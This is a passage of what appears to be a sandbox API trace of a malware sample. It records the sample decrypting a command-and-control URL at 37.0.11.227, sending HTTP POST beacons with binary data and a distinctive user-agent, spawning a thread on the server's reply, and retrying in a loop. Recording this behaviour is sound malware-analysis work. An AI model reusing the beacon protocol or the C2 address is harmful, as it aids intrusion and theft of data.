dwFlags=0x0) returned 1 [0244.772] GetProcessHeap () returned 0x690000 [0244.773] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0244.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.774] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0244.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.776] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0244.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.777] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0244.777] GetProcessHeap () returned 0x690000 [0244.777] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0244.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.782] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0244.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.783] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0244.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.784] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0244.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.792] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0244.792] GetProcessHeap () returned 0x690000 [0244.792] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0244.792] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0244.792] GetProcessHeap () returned 0x690000 [0244.792] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0244.792] socket (af=2, type=1, protocol=6) returned 0x698 [0244.793] connect (s=0x698, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0244.817] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0244.817] GetProcessHeap () returned 0x690000 [0244.817] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0244.817] GetProcessHeap () returned 0x690000 [0244.817] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0244.817] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0244.818] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0244.818] GetProcessHeap () returned 0x690000 [0244.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0244.818] GetProcessHeap () returned 0x690000 [0244.819] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0244.820] GetProcessHeap () returned 0x690000 [0244.820] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0244.820] GetProcessHeap () returned 0x690000 [0244.820] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0244.821] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0244.822] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0244.822] GetProcessHeap () returned 0x690000 [0244.822] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0244.822] GetProcessHeap () returned 0x690000 [0244.822] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0244.822] send (s=0x698, buf=0x6ad508*, len=242, flags=0) returned 242 [0244.826] send (s=0x698, buf=0x6aba40*, len=159, flags=0) returned 159 [0244.826] GetProcessHeap () returned 0x690000 [0244.826] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0244.826] recv (in: s=0x698, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0244.912] GetProcessHeap () returned 0x690000 [0244.912] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0244.912] GetProcessHeap () returned 0x690000 [0244.913] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0244.919] GetProcessHeap () returned 0x690000 [0244.922] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0244.923] GetProcessHeap () returned 0x690000 [0244.923] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0244.924] closesocket (s=0x698) returned 0 [0244.929] GetProcessHeap () returned 0x690000 [0244.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0244.929] GetProcessHeap () returned 0x690000 [0244.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0244.930] GetProcessHeap () returned 0x690000 [0244.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0244.930] GetProcessHeap () returned 0x690000 [0244.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0244.931] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8d4) returned 0x698 [0244.934] Sleep (dwMilliseconds=0xea60) [0244.936] GetProcessHeap () returned 0x690000 [0244.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0244.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.939] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.946] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0244.953] GetProcessHeap () returned 0x690000 [0244.954] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0244.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.954] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0244.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.963] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.964] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.964] GetProcessHeap () returned 0x690000 [0244.965] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0244.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.966] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0244.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.970] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0244.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.972] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0244.972] GetProcessHeap () returned 0x690000 [0244.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0244.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.974] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0244.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.975] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0244.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.976] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0244.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.977] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0244.977] GetProcessHeap () returned 0x690000 [0244.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0244.977] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0244.978] GetProcessHeap () returned 0x690000 [0244.978] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0244.978] GetProcessHeap () returned 0x690000 [0244.979] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0244.979] GetProcessHeap () returned 0x690000 [0244.979] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0244.981] GetProcessHeap () returned 0x690000 [0244.981] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0244.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.982] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.986] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0244.995] GetProcessHeap () returned 0x690000 [0244.995] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0244.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.996] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0244.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.998] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.999] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.999] GetProcessHeap () returned 0x690000 [0244.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0245.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.003] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0245.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.005] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0245.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.006] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0245.006] GetProcessHeap () returned 0x690000 [0245.006] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0245.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.008] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0245.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.008] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0245.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.009] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0245.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.010] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0245.010] GetProcessHeap () returned 0x690000 [0245.010] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0245.010] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0245.010] GetProcessHeap () returned 0x690000 [0245.010] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0245.010] socket (af=2, type=1, protocol=6) returned 0x69c [0245.010] connect (s=0x69c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0245.038] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0245.038] GetProcessHeap () returned 0x690000 [0245.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0245.038] GetProcessHeap () returned 0x690000 [0245.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0245.038] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0245.039] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0245.039] GetProcessHeap () returned 0x690000 [0245.039] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0245.039] GetProcessHeap () returned 0x690000 [0245.040] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0245.040] GetProcessHeap () returned 0x690000 [0245.040] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0245.040] GetProcessHeap () returned 0x690000 [0245.040] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0245.040] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0245.041] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0245.041] GetProcessHeap () returned 0x690000 [0245.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0245.041] GetProcessHeap () returned 0x690000 [0245.042] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0245.042] send (s=0x69c, buf=0x6ad508*, len=242, flags=0) returned 242 [0245.042] send (s=0x69c, buf=0x6aba40*, len=159, flags=0) returned 159 [0245.042] GetProcessHeap () returned 0x690000 [0245.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0245.042] recv (in: s=0x69c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0245.116] GetProcessHeap () returned 0x690000 [0245.117] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0245.117] GetProcessHeap () returned 0x690000 [0245.117] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0245.117] GetProcessHeap () returned 0x690000 [0245.117] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0245.117] GetProcessHeap () returned 0x690000 [0245.117] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0245.117] closesocket (s=0x69c) returned 0 [0245.118] GetProcessHeap () returned 0x690000 [0245.118] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0245.118] GetProcessHeap () returned 0x690000 [0245.118] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0245.118] GetProcessHeap () returned 0x690000 [0245.119] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0245.119] GetProcessHeap () returned 0x690000 [0245.119] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0245.119] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf3c) returned 0x69c [0245.121] Sleep (dwMilliseconds=0xea60) [0245.122] GetProcessHeap () returned 0x690000 [0245.122] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0245.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.125] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0245.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.130] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0245.136] GetProcessHeap () returned 0x690000 [0245.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0245.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.137] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0245.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.138] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0245.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.139] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.139] GetProcessHeap () returned 0x690000 [0245.140] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0245.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.141] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0245.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.142] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0245.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.143] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0245.143] GetProcessHeap () returned 0x690000 [0245.143] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0245.164] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.164] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0245.164] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.165] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0245.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.165] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0245.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.166] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0245.166] GetProcessHeap () returned 0x690000 [0245.166] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0245.166] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0245.167] GetProcessHeap () returned 0x690000 [0245.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0245.168] GetProcessHeap () returned 0x690000 [0245.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0245.170] GetProcessHeap () returned 0x690000 [0245.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0245.170] GetProcessHeap () returned 0x690000 [0245.170] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0245.171] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.171] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0245.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.176] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0245.183] GetProcessHeap () returned 0x690000 [0245.183] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0245.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.184] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0245.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.185] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0245.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.186] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.186] GetProcessHeap () returned 0x690000 [0245.186] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0245.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.187] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0245.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.188] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0245.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.189] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0245.189] GetProcessHeap () returned 0x690000 [0245.189] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0245.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.190] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0245.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.193] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0245.194] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.194] StrStrA 